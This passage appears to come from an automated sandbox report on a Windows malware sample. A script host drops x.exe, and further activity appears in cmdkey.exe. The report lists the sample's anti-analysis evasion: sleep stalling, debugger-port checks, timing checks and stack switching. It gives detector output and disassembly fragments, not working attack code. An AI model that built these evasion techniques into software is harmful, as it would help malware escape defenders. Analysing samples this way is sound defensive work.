        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_0357EA6D push ebp; iretd 4_2_0357EB30
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_0358C2D4 push eax; ret 4_2_0358C2EF
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_03596138 push ss; ret 4_2_03596139
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_03592079 push 0000002Dh; ret 4_2_0359208B
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_0358D0AE push edx; retf 4_2_0358D0B7
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_0357C617 push ecx; ret 4_2_0357C618
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_0357FD17 push FFFFFF9Ch; ret 4_2_0357FD19
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_03584CCD push ss; ret 4_2_03584CEE
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_033E21AD pushad ; retf 0004h5_2_033E223F
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_033EE074 pushfd ; retf 5_2_033EE075
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_033EE060 push eax; retf 0008h5_2_033EE06D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_033E97A1 push es; iretd 5_2_033E97A8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034108CD push ecx; mov dword ptr [esp], ecx5_2_034108D6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A351EA push FFFFFF9Ch; ret 5_2_00A351EC
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A4F140 push edi; iretd 5_2_00A4F148
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A42581 push edx; retf 5_2_00A4258A
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A4754C push 0000002Dh; ret 5_2_00A4755E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A4B60B push ss; ret 5_2_00A4B60C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A417A7 push eax; ret 5_2_00A417C2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A50843 push esp; iretd 5_2_00A5086F
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A31AEA push ecx; ret 5_2_00A31AEB
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A49E4A push esi; ret 5_2_00A49E5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A49E50 push esi; ret 5_2_00A49E5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A33F40 push ebp; iretd 5_2_00A34003
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03336245 push ecx; iretd 5_2_0333627D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333F10A push 096B400Eh; ret 5_2_0333F117
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_033361F9 push ecx; iretd 5_2_0333627D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333562C push ss; retf 5_2_03335636
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03337585 push sp; ret 5_2_03337589
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03336438 push ebp; retf 5_2_0333643B
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dllJump to dropped file
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Found stalling execution ending in API Sleep call
        Source: C:\Users\user\AppData\Local\Temp\x.exeStalling execution: Execution stalls by calling Sleepgraph_2-3041
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\AppData\Local\Temp\x.exeAPI/Special instruction interceptor: Address: 3F7BCFD
        Source: C:\Users\user\AppData\Local\Temp\x.exeAPI/Special instruction interceptor: Address: 2C4BCFD
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFFD506D144
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFFD506D604
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFFD506D764
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFFD506D324
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFFD506D364
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFFD506D004
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFFD506FF74
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFFD506D864
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 rdtsc 3_2_34541763
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeWindow / User API: threadDelayed 8944Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\x.exeAPI coverage: 0.2 %
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI coverage: 3.2 %
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 6336Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 6336Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 6336Thread sleep count: 8944 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 6336Thread sleep time: -17888000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100Thread sleep time: -90000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100Thread sleep count: 38 > 30Jump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100Thread sleep time: -57000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100Thread sleep count: 43 > 30Jump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe TID: 5100Thread sleep time: -43000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040627E FindFirstFileA,FindClose,2_2_0040627E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004063BE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_004063BE
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A4C710 FindFirstFileW,FindNextFileW,FindClose,5_2_00A4C710
        Source: wscript.exe, 00000000.00000003.135407958651.000001562EF21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lEdgchX5LPqEmu69jse7zXbd1bDzwZ2Pmkbkd&&&btR1ZU9+X)737)m
        Source: wscript.exe, 00000000.00000003.135421821173.000001562E91E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135423382734.000001562E92C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135421214491.000001562E913000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135423330792.000001562E920000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lEdgchX5LPqEmu69jse7zXbd1bDzwZ2Pmkbkd&&&btR1ZU9+X)737)mW
        Source: wscript.exe, 00000000.00000003.135436511679.000001562AF71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135452657654.000001562AFC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135435935423.000001562ECDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135452379056.000001562AFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135444066039.000001562AF92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135439188967.000001562ECE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135436931344.000001562AF7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.135436321211.000001562AF5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7sWsnONCa;;sS..j&&&N..cAEGWAEdgchX5LPqEmu69jse7zXbd1bDzwZ2Pmkbkd&&&btR1ZU9+X
        Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_2-2627
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 rdtsc 3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345434E0 NtCreateMutant,LdrInitializeThunk,3_2_345434E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_73AD2288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_73AD2288
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450D454 mov eax, dword ptr fs:[00000030h]3_2_3450D454
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450D454 mov eax, dword ptr fs:[00000030h]3_2_3450D454
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450D454 mov eax, dword ptr fs:[00000030h]3_2_3450D454
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450D454 mov eax, dword ptr fs:[00000030h]3_2_3450D454
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450D454 mov eax, dword ptr fs:[00000030h]3_2_3450D454
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450D454 mov eax, dword ptr fs:[00000030h]3_2_3450D454
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E45E mov eax, dword ptr fs:[00000030h]3_2_3452E45E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E45E mov eax, dword ptr fs:[00000030h]3_2_3452E45E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E45E mov eax, dword ptr fs:[00000030h]3_2_3452E45E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E45E mov eax, dword ptr fs:[00000030h]3_2_3452E45E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E45E mov eax, dword ptr fs:[00000030h]3_2_3452E45E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510445 mov eax, dword ptr fs:[00000030h]3_2_34510445
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510445 mov eax, dword ptr fs:[00000030h]3_2_34510445
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510445 mov eax, dword ptr fs:[00000030h]3_2_34510445
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510445 mov eax, dword ptr fs:[00000030h]3_2_34510445
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510445 mov eax, dword ptr fs:[00000030h]3_2_34510445
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510445 mov eax, dword ptr fs:[00000030h]3_2_34510445
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34508470 mov eax, dword ptr fs:[00000030h]3_2_34508470
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34508470 mov eax, dword ptr fs:[00000030h]3_2_34508470
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF478 mov eax, dword ptr fs:[00000030h]3_2_345BF478
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CA464 mov eax, dword ptr fs:[00000030h]3_2_345CA464
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F640D mov eax, dword ptr fs:[00000030h]3_2_344F640D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF409 mov eax, dword ptr fs:[00000030h]3_2_345BF409
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB420 mov eax, dword ptr fs:[00000030h]3_2_344FB420
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34537425 mov eax, dword ptr fs:[00000030h]3_2_34537425
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34537425 mov ecx, dword ptr fs:[00000030h]3_2_34537425
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458F42F mov eax, dword ptr fs:[00000030h]3_2_3458F42F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458F42F mov eax, dword ptr fs:[00000030h]3_2_3458F42F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458F42F mov eax, dword ptr fs:[00000030h]3_2_3458F42F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458F42F mov eax, dword ptr fs:[00000030h]3_2_3458F42F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458F42F mov eax, dword ptr fs:[00000030h]3_2_3458F42F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F4D0 mov eax, dword ptr fs:[00000030h]3_2_3452F4D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F4D0 mov eax, dword ptr fs:[00000030h]3_2_3452F4D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F4D0 mov eax, dword ptr fs:[00000030h]3_2_3452F4D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F4D0 mov eax, dword ptr fs:[00000030h]3_2_3452F4D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F4D0 mov eax, dword ptr fs:[00000030h]3_2_3452F4D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F4D0 mov eax, dword ptr fs:[00000030h]3_2_3452F4D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F4D0 mov eax, dword ptr fs:[00000030h]3_2_3452F4D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F4D0 mov eax, dword ptr fs:[00000030h]3_2_3452F4D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F4D0 mov eax, dword ptr fs:[00000030h]3_2_3452F4D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345244D1 mov eax, dword ptr fs:[00000030h]3_2_345244D1
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345244D1 mov eax, dword ptr fs:[00000030h]3_2_345244D1
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345214C9 mov eax, dword ptr fs:[00000030h]3_2_345214C9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345214C9 mov eax, dword ptr fs:[00000030h]3_2_345214C9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345214C9 mov eax, dword ptr fs:[00000030h]3_2_345214C9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345214C9 mov eax, dword ptr fs:[00000030h]3_2_345214C9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345214C9 mov eax, dword ptr fs:[00000030h]3_2_345214C9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345064F0 mov eax, dword ptr fs:[00000030h]3_2_345064F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF4FD mov eax, dword ptr fs:[00000030h]3_2_345BF4FD
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345294FA mov eax, dword ptr fs:[00000030h]3_2_345294FA
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345354E0 mov eax, dword ptr fs:[00000030h]3_2_345354E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453E4EF mov eax, dword ptr fs:[00000030h]3_2_3453E4EF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453E4EF mov eax, dword ptr fs:[00000030h]3_2_3453E4EF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453B490 mov eax, dword ptr fs:[00000030h]3_2_3453B490
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453B490 mov eax, dword ptr fs:[00000030h]3_2_3453B490
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458C490 mov eax, dword ptr fs:[00000030h]3_2_3458C490
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34500485 mov ecx, dword ptr fs:[00000030h]3_2_34500485
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453E4BC mov eax, dword ptr fs:[00000030h]3_2_3453E4BC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345024A2 mov eax, dword ptr fs:[00000030h]3_2_345024A2
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345024A2 mov ecx, dword ptr fs:[00000030h]3_2_345024A2
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458D4A0 mov ecx, dword ptr fs:[00000030h]3_2_3458D4A0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458D4A0 mov eax, dword ptr fs:[00000030h]3_2_3458D4A0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458D4A0 mov eax, dword ptr fs:[00000030h]3_2_3458D4A0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345344A8 mov eax, dword ptr fs:[00000030h]3_2_345344A8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB55F mov eax, dword ptr fs:[00000030h]3_2_345DB55F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB55F mov eax, dword ptr fs:[00000030h]3_2_345DB55F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CA553 mov eax, dword ptr fs:[00000030h]3_2_345CA553
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34536540 mov eax, dword ptr fs:[00000030h]3_2_34536540
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451E547 mov eax, dword ptr fs:[00000030h]3_2_3451E547
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450254C mov eax, dword ptr fs:[00000030h]3_2_3450254C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451C560 mov eax, dword ptr fs:[00000030h]3_2_3451C560
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov ecx, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov ecx, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF51B mov eax, dword ptr fs:[00000030h]3_2_345AF51B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458C51D mov eax, dword ptr fs:[00000030h]3_2_3458C51D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34521514 mov eax, dword ptr fs:[00000030h]3_2_34521514
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34521514 mov eax, dword ptr fs:[00000030h]3_2_34521514
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34521514 mov eax, dword ptr fs:[00000030h]3_2_34521514
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34521514 mov eax, dword ptr fs:[00000030h]3_2_34521514
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34521514 mov eax, dword ptr fs:[00000030h]3_2_34521514
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34521514 mov eax, dword ptr fs:[00000030h]3_2_34521514
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB502 mov eax, dword ptr fs:[00000030h]3_2_344FB502
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34502500 mov eax, dword ptr fs:[00000030h]3_2_34502500
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E507 mov eax, dword ptr fs:[00000030h]3_2_3452E507
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E507 mov eax, dword ptr fs:[00000030h]3_2_3452E507
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E507 mov eax, dword ptr fs:[00000030h]3_2_3452E507
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E507 mov eax, dword ptr fs:[00000030h]3_2_3452E507
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E507 mov eax, dword ptr fs:[00000030h]3_2_3452E507
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E507 mov eax, dword ptr fs:[00000030h]3_2_3452E507
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E507 mov eax, dword ptr fs:[00000030h]3_2_3452E507
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E507 mov eax, dword ptr fs:[00000030h]3_2_3452E507
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453C50D mov eax, dword ptr fs:[00000030h]3_2_3453C50D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453C50D mov eax, dword ptr fs:[00000030h]3_2_3453C50D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34503536 mov eax, dword ptr fs:[00000030h]3_2_34503536
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34503536 mov eax, dword ptr fs:[00000030h]3_2_34503536
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542539 mov eax, dword ptr fs:[00000030h]3_2_34542539
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F753F mov eax, dword ptr fs:[00000030h]3_2_344F753F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F753F mov eax, dword ptr fs:[00000030h]3_2_344F753F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F753F mov eax, dword ptr fs:[00000030h]3_2_344F753F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34531527 mov eax, dword ptr fs:[00000030h]3_2_34531527
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451252B mov eax, dword ptr fs:[00000030h]3_2_3451252B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451252B mov eax, dword ptr fs:[00000030h]3_2_3451252B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451252B mov eax, dword ptr fs:[00000030h]3_2_3451252B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451252B mov eax, dword ptr fs:[00000030h]3_2_3451252B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451252B mov eax, dword ptr fs:[00000030h]3_2_3451252B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451252B mov eax, dword ptr fs:[00000030h]3_2_3451252B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451252B mov eax, dword ptr fs:[00000030h]3_2_3451252B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345365D0 mov eax, dword ptr fs:[00000030h]3_2_345365D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF5C7 mov eax, dword ptr fs:[00000030h]3_2_344FF5C7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF5C7 mov eax, dword ptr fs:[00000030h]3_2_344FF5C7
